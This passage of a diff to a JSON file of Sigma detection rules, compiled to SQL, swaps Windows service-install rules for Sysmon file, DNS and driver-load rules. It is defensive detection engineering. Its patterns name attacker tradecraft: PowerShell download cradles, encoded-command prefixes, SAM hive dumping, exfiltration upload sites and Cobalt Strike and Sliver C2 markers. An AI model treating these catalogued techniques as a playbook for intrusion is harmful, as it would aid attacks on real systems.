'%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 
'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", "status": "experimental", - "description": 
"Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was 
highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 
'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": 
"file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "title": "File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((Image LIKE 
'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "status": "experimental", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "title": "Regsvr32 
Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", "status": "test", - "description": "Detects service installation with suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "tags": [ + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 
'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": 
"dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for 
Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", + "status": "experimental", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "win_system_apt_stonedrill.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", - "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "status": "experimental", + "description": "Detects DNS queries to \"ufile.io\". 
Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", - "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": 
"dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", "status": "experimental", - 
"description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 